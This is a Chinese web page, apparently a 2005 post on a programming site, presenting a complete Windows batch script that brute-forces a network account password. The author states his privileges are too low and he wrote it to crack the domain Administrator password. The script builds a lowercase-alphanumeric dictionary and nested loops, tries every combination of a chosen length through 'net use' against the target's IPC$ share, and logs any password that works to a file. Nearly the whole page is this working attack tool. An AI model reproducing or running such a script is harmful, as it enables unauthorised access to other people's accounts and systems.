首页 | 程式人生 | 原创下载 | 技术文档 | 留言我们 | 关于我们

用批处理实现局域网口令的破解

作者: phanrider        2005-07-13
最近权限太小,想要破domain\Administrator的口令,所以写了这个小程序


@REM ================================
@REM = Write phanrider =
@REM = 2005.7.13 =
@REM ================================


:setlocal

@rem ==================================================================
@rem 初始化及口令文件名passwd.txt
@rem ==================================================================
@echo off
setlocal
set passfile=passwd.txt
set dict=dict_$.dat
set ip=%1
set user=%2
set tempbat=zhl_$.bat
set num=%3


:BEGIN
if "%ip%"=="" goto :HELP
if "%num%"=="" goto :HELP
if "%user%"=="" goto :HELP
if "%ip%"=="0" @echo IP不能为零! && goto :END
if "%num%"=="0" @echo 口令长度不能为零! && goto :END

rem ==================================================================
rem 删除文件
rem ==================================================================
if exist %dict% erase %dict% 1>nul 2>&1
if exist %tempbat% erase %tempbat% 1>nul 2>&1


rem ==================================================================
rem 生成主程式
rem ==================================================================

for /L %%n in (1,1,%num%) do (
if %%n==1 echo for /F ^%%^%%a in (%dict%^) do ( >> %tempbat%
if %%n==2 echo for /F ^%%^%%b in (%dict%^) do ( >> %tempbat%
if %%n==3 echo for /F ^%%^%%c in (%dict%^) do ( >> %tempbat%
if %%n==4 echo for /F ^%%^%%d in (%dict%^) do ( >> %tempbat%
if %%n==5 echo for /F ^%%^%%e in (%dict%^) do ( >> %tempbat%
if %%n==6 echo for /F ^%%^%%f in (%dict%^) do ( >> %tempbat%
if %%n==7 echo for /F ^%%^%%g in (%dict%^) do ( >> %tempbat%
if %%n==8 echo for /F ^%%^%%h in (%dict%^) do ( >> %tempbat%
if %%n==9 echo for /F ^%%^%%i in (%dict%^) do ( >> %tempbat%
if %%n==10 echo for /F ^%%^%%j in (%dict%^) do ( >> %tempbat%
)

if %num%==10 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i%%%%j" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i%%%%j" ^>^> %passfile% >> %tempbat%
if %num%==9 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h%%%%i" ^>^> %passfile% >> %tempbat%
if %num%==8 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g%%%%h" ^>^> %passfile% >> %tempbat%
if %num%==7 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f%%%%g" ^>^> %passfile% >> %tempbat%
if %num%==6 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e%%%%f" ^>^> %passfile% >> %tempbat%
if %num%==5 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d%%%%e" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d%%%%e" ^>^> %passfile% >> %tempbat%
if %num%==4 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c%%%%d" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c%%%%d" ^>^> %passfile% >> %tempbat%
if %num%==3 echo net use \\%ip%\ipc$ "%%%%a%%%%b%%%%c" /user:"%user%" ^&^& echo "%%%%a%%%%b%%%%c" ^>^> %passfile% >> %tempbat%
if %num%==2 echo net use \\%ip%\ipc$ "%%%%a%%%%b" /user:"%user%" ^&^& echo "%%%%a%%%%b" ^>^> %passfile% >> %tempbat%
if %num%==1 echo net use \\%ip%\ipc$ "%%%%a" /user:"%user%" ^&^& echo "%%%%a" ^>^> %passfile% >> %tempbat%


for /L %%n in (1,1,%num%) do echo ^) >> %tempbat%


rem ==================================================================
rem 生成字典
rem ==================================================================
echo 1 >> %dict%
echo 2 >> %dict%
echo 3 >> %dict%
echo 4 >> %dict%
echo 5 >> %dict%
echo 6 >> %dict%
echo 7 >> %dict%
echo 8 >> %dict%
echo 9 >> %dict%
echo 0 >> %dict%
echo a >> %dict%
echo b >> %dict%
echo c >> %dict%
echo d >> %dict%
echo e >> %dict%
echo f >> %dict%
echo g >> %dict%
echo h >> %dict%
echo i >> %dict%
echo j >> %dict%
echo k >> %dict%
echo l >> %dict%
echo m >> %dict%
echo n >> %dict%
echo o >> %dict%
echo p >> %dict%
echo q >> %dict%
echo r >> %dict%
echo s >> %dict%
echo t >> %dict%
echo u >> %dict%
echo v >> %dict%
echo w >> %dict%
echo x >> %dict%
echo y >> %dict%
echo z >> %dict%


rem ==================================================================
rem 开始执行
rem ==================================================================
call %tempbat%




rem ==================================================================
rem 清理垃圾
rem ==================================================================
erase %dict% 1>nul 2>&1
erase %tempbat% 1>nul 2>&1


:HELP
echo 可能暴破口令的工具
echo.
echo USE: %0 Ip User Num
echo.
echo Ip 是指目标机器的IP
echo user 是指目标机器上的用户名
echo Num 是指口令长度


:END

endlocal


→返回←

红蜻蜓工作室版权所有
Copyright © 1999-2025 Reddragonfly & Studio All Rights Reserved.
如有任何问题及建议请留言红蜻蜓工作室